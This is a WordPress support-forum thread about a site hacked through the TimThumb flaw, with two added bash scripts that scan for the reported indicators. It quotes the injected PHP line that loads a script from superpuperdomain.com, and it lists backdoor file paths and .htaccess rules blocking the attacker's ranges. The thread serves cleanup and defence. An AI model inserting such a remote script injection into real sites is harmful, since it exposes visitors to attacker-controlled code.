Title: Two Strange Errors
Last modified: August 20, 2016

---

# Two Strange Errors

 *  Resolved [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/)
 * Hello,
 * I am using Version 1.9.1 of your plugin.
 * Things have worked great for a long time but recently things have gone haywire.
 * I have two problems that I cannot seem to figure out.
 * 1. I am now forced to log into my WordPress admin via https. If I log in via http,
   I am redirected to the log in each and every time.
 * 2. For some reason, I started to get browser warnings that my https is not loading
   secure along with a broken https in the browser's URL line. The culprit turned
   out to be [http://superpuperdomain.com/count.php](http://superpuperdomain.com/count.php)
   which apparently is WordPress core code (index.php). So I enabled, as suggested
   in this forum, External HTTPS Elements and Bypass External Check. That fixed
   the security errors. However, now in Internet Explorer 9, I get this warning:
   “Internet Explorer block this website from displaying content with security certificate
   errors.” The interesting thing is this appears on non-https pages – even before
   I reach a https page. This is a new error, and I am confident my security certificate
   is fine.
 * Any suggestions?
 * Thanks!
    Chris

Viewing 15 replies - 1 through 15 (of 34 total)


 *  [bballad](https://wordpress.org/support/users/bballad/)
 * (@bballad)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230692)
 * You have been hacked, your theme is the culprit
 * [http://wordpress.org/support/topic/rss-feed-crash?replies=6](http://wordpress.org/support/topic/rss-feed-crash?replies=6)
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230701)
 * Dang. I think you are right. I checked my index.php against a freshly downloaded
   WordPress 3.2.1 and indeed it is not part of the core WordPress Code.
 * In fact, I found the exact code identified in the link you sent:
 *     ```
       /** Loads the WordPress Environment and Template */
       require('./wp-blog-header.php');
       echo'<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>'; ?>
       ```
   
 * Now I need to figure out how to fix this.
 * Thanks for your help.
 * Chris
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230714)
 * Going to quote my post for y’all
 * Hello,
 * I have/had a similar problem, not with my rss though.
 * You should read the following about superpuperdomain.com
 * What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated
   by hackers gaining write access to your WordPress directory. I myself did not
   take an image of it, but was dumb enough to fall for it. What it did was it would
   show an HTTP authentication-like alert upon launching the WordPress administration
   directory and entering your username and password would show a message linking
   to a page in another language.
 * Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.
 * I learned that this hack was caused by a security vulnerability in timthumb.php(
   a thumbnail fetching script) and I was susceptible because I did not update my
   timthumb.php.
 * I scoured the Internet and finally found a fix.
 * First, in your WordPress’s index.php, remove the following script added by the
   hack:
 *     ```
       echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='. urlencode($_SERVER['HTTP_REFERER']) .'"></script>';
       ```
   
 * Then remove three phony files added by the hackers (back up first, in case your
   installation actually requires these files):
 *     ```
       /wp-admin/js/config.php
       /wp-admin/common.php
       /wp-content/udp.php
       ```
   
 * Do not try to open any of these files, as my antivirus sounded alarms immediately.
 * I learned my lesson, and upon purging TechSpheria of this hack, I changed about
   twenty passwords.
 * To increase your site’s security, make sure you have correct permissions for 
   files and directories.
 * Folder permissions for all of my WordPress installations are 755 whereas file
   permissions are 644.
 * Run this bash command to set the correct permissions recursively for your WordPress
   installation:
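 *     ```
       # directories get 755, regular files get 644
       find /wordpressdirectory -type d -exec chmod 755 {} + -o -type f -exec chmod 644 {} +
       ```
   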
 * I also added this rule in my .htaccess (in my account’s root folder, not inside
   public_html):
 *     ```
       order allow,deny
       deny from 91.220
       allow from all
       ```
   
 * The malicious script was run from superpuperdomain.com and I had run a traceroute
   on that domain, and found its servers’ IP addresses. To be safe, I blocked all
   the IPs in their range (91.220) and they would receive a forbidden notice if 
   they tried to access TechSpheria again.
 * Source: Techspheria
 * [http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/](http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/)
 * Maybe it is a smart idea to check your WordPress installation for the files, 
   ban the IP and update your timthumb.php…. Just in case 😉
 * I guess we have to keep monitoring the website TechSpheria, because yesterday
   they said there were two phony files, today there are three.
 * Kind regards, OceansDB
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230735)
 * Sorry to hear you got hacked. Once the dust settles, let me know if you’re having
   any issue with my plugin.
 * Also, not that I’ve tried any of them, but do you have any security plugins installed?
   I don’t really have any recommendations as I’ve never used them. I run my own
   server and tend to keep it on lockdown. I haven’t had any issues yet, other than
   some clever spam bots on one of my Buddypress sites.
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230764)
 * It is not your plugin. Timthumb.php has a security leak. The TS (topic starter)
   has to update his timthumb script.
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230770)
 * Yes, I know. I can read. Lol.
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230792)
 * Thanks everyone for the posts. I was indeed hacked because of the timthumb. It
   was used in my theme (Elegant Themes). The guys at BlogOnCloud9 are wonderful
   and responsive and already cleaned my website today. Everything is running fine
   again.
 * However, Mvied, I can not figure this one out. I am forced to log-in https on
   my website. If I log-in http, the log-in fails, and it re-directs to this link:
   [http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F](http://www.bmedpress.com/wp-login.php?redirect_to=https%3A%2F%2Fwww.bmedpress.com%2Fwp-admin%2F)
 * Any suggestions?
 * Chris
 *  Plugin Author [mvied](https://wordpress.org/support/users/mvied/)
 * (@mvied)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230794)
 * Hey cfisher,
 * I just released version 1.9.2 which has a fix for that issue. I actually ninja’d
   the fix into 1.9.1, but if you downloaded it before that, the bug would still
   occur. Update and let me know if that fixes it for you.
 * Thanks,
    Mike
 *  Thread Starter [cfisher](https://wordpress.org/support/users/cfisher/)
 * (@cfisher)
 * [14 years, 8 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230806)
 * Hi Mvied,
 * That fixed it! Thanks for the prompt response and fix. Thanks to the community
   for their input too.
 * All items have been resolved in this thread now.
 * Thanks!
    Chris
 *  Moderator [Ipstenu (Mika Epstein)](https://wordpress.org/support/users/ipstenu/)
 * (@ipstenu)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230858)
 * For those following along, this seems to be the TimThumb issue: [http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain-com-attacking-timthumb-php.html](http://blog.sucuri.net/2011/08/wordpress-sites-hacked-with-superpuperdomain-com-attacking-timthumb-php.html)
 *  [RoarinRow](https://wordpress.org/support/users/roarinrow/)
 * (@roarinrow)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230859)
 * Thanks for the fix and the suggestions! I found all the files in question.
 *  [OceansDB](https://wordpress.org/support/users/oceansdb/)
 * (@oceansdb)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230865)
 * Okay, going to copy paste a few details here. The site you are giving Ipstenu
   is great, but doesn’t inform about the phony files superpuperdomain places in
   your wordpress installation.
 * **Please do not forget to delete these files!**
 *     ```
       /wp-admin/js/config.php
       /wp-admin/common.php
       /wp-admin/udp.php
       /wp-content/udp.php
       /wp-content/uploads/feed-file.php
       /wp-content/uploads/feed-files.php
       ```
   
 * **Don’t forget to make a .htaccess file outside your public_html with these lines:**
 *     ```
       order allow,deny
       deny from 91.220
       deny from 91.196
       deny from superpuperdomain.com
       deny from superpuperdomain2.com
       allow from all
       ```
   
 * Thank you 🙂
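
The indicators listed in this thread, collected into a read-only check (an added example, not part of any post above and not code from the plugin or from TechSpheria). The file paths and the two domains are copied from the posts; the function name `scan_wp` is an assumption, and a grep that supports `-r` and `--include` is assumed.

```bash
#!/usr/bin/env bash
# Added example. Paths and domains are copied from the posts in this thread;
# the function name scan_wp is an assumption. Read-only: nothing is deleted.

IOC_FILES='wp-admin/js/config.php
wp-admin/common.php
wp-admin/udp.php
wp-content/udp.php
wp-content/uploads/feed-file.php
wp-content/uploads/feed-files.php'

# Matches superpuperdomain.com and superpuperdomain2.com
IOC_PATTERN='superpuperdomain2?\.com'

# scan_wp ROOT
#   prints "FILE <path>"   for each listed phony file that exists
#   prints "INJECT <path>" for each .php file that references the domain
#   returns 1 if anything was reported, 0 if the tree looks clean
scan_wp() {
    root=${1%/}
    found=0
    while IFS= read -r rel; do
        if [ -e "$root/$rel" ]; then
            printf 'FILE %s\n' "$rel"
            found=1
        fi
    done <<EOF
$IOC_FILES
EOF
    # grep -l prints names only, so file contents are never displayed or run.
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        printf 'INJECT %s\n' "${f#"$root"/}"
        found=1
    done <<EOF
$(grep -rlE --include='*.php' -e "$IOC_PATTERN" "$root" 2>/dev/null)
EOF
    return "$found"
}

# Stand-alone use: ./scan.sh /path/to/wordpress
if [ "$#" -gt 0 ]; then scan_wp "$1"; fi
```

A clean result only means these specific indicators are absent; later posts in the thread report further injected files that this list does not cover.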
 *  [lfaria](https://wordpress.org/support/users/lfaria/)
 * (@lfaria)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230870)
 * Apart from these files, I also found:
 *     ```
       /wp-content/e334….php
       /wp-config.php
       /index.php
       ```
   
 * which had injected code.
 * Lauro Faria
    [http://www.bdibbs.com.br](http://www.bdibbs.com.br)
 *  [wolfsteritory](https://wordpress.org/support/users/wolfsteritory/)
 * (@wolfsteritory)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230873)
 * OK. So how do we make this update to TimThumb?
 * I deleted those files last week, all was fine, but now it seems I can see any
   pictures in my websites, that are with external content.
 * In FTP I see that timthumb.php was modified yesterday!
 *  [lfaria](https://wordpress.org/support/users/lfaria/)
 * (@lfaria)
 * [14 years, 7 months ago](https://wordpress.org/support/topic/two-strange-errors/#post-2230874)
 * Check the version of Timthumb.php. Here, it was version 2.4, but adulterated.
   The latest version is 2.7, but compare with the official version: [http://timthumb.googlecode.com/svn/trunk/timthumb.php](http://timthumb.googlecode.com/svn/trunk/timthumb.php)
   Stay tuned.
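
The comparison cfisher and lfaria describe (checking live files against a freshly downloaded copy), generalized to the whole tree as an added example that is not from any post in this thread. It assumes a clean archive of the same WordPress version is already unpacked locally; `compare_to_clean` and both directory arguments are hypothetical names.

```bash
#!/usr/bin/env bash
# Added example. compare_to_clean LIVE CLEAN
#   LIVE  = the installed WordPress directory
#   CLEAN = an unpacked, freshly downloaded copy of the same version (assumed)
# Prints MISSING / MODIFIED / EXTRA lines and returns 1 on any drift.
compare_to_clean() {
    live=${1%/}
    clean=${2%/}
    drift=0
    # 1. Every file shipped in the clean copy should be byte-identical live.
    while IFS= read -r rel; do
        [ -n "$rel" ] || continue
        if [ ! -f "$live/$rel" ]; then
            printf 'MISSING %s\n' "$rel"
            drift=1
        elif ! cmp -s "$clean/$rel" "$live/$rel"; then
            printf 'MODIFIED %s\n' "$rel"
            drift=1
        fi
    done <<EOF
$(cd "$clean" && find . -type f | sed 's|^\./||' | sort)
EOF
    # 2. wp-admin and wp-includes hold only core files, so a PHP file there
    #    that the clean copy lacks deserves a look. wp-content is skipped
    #    because themes, plugins and uploads legitimately differ per site.
    while IFS= read -r rel; do
        [ -n "$rel" ] || continue
        if [ ! -e "$clean/$rel" ]; then
            printf 'EXTRA %s\n' "$rel"
            drift=1
        fi
    done <<EOF
$(cd "$live" && find wp-admin wp-includes -type f -name '*.php' 2>/dev/null | sort)
EOF
    return "$drift"
}

# Stand-alone use: ./compare.sh /path/to/live /path/to/clean
if [ "$#" -eq 2 ]; then compare_to_clean "$1" "$2"; fi
```

wp-config.php is not shipped in the download, so it is not compared here and has to be reviewed by hand, as does a theme's bundled timthumb.php against the official file.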


The topic ‘Two Strange Errors’ is closed to new replies.


 * 34 replies
 * 14 participants
 * Last reply from: [Mike](https://wordpress.org/support/users/wordpresskeepercom/)
 * Last activity: [14 years, 1 month ago](https://wordpress.org/support/topic/two-strange-errors/page/3/#post-2230996)
 * Status: resolved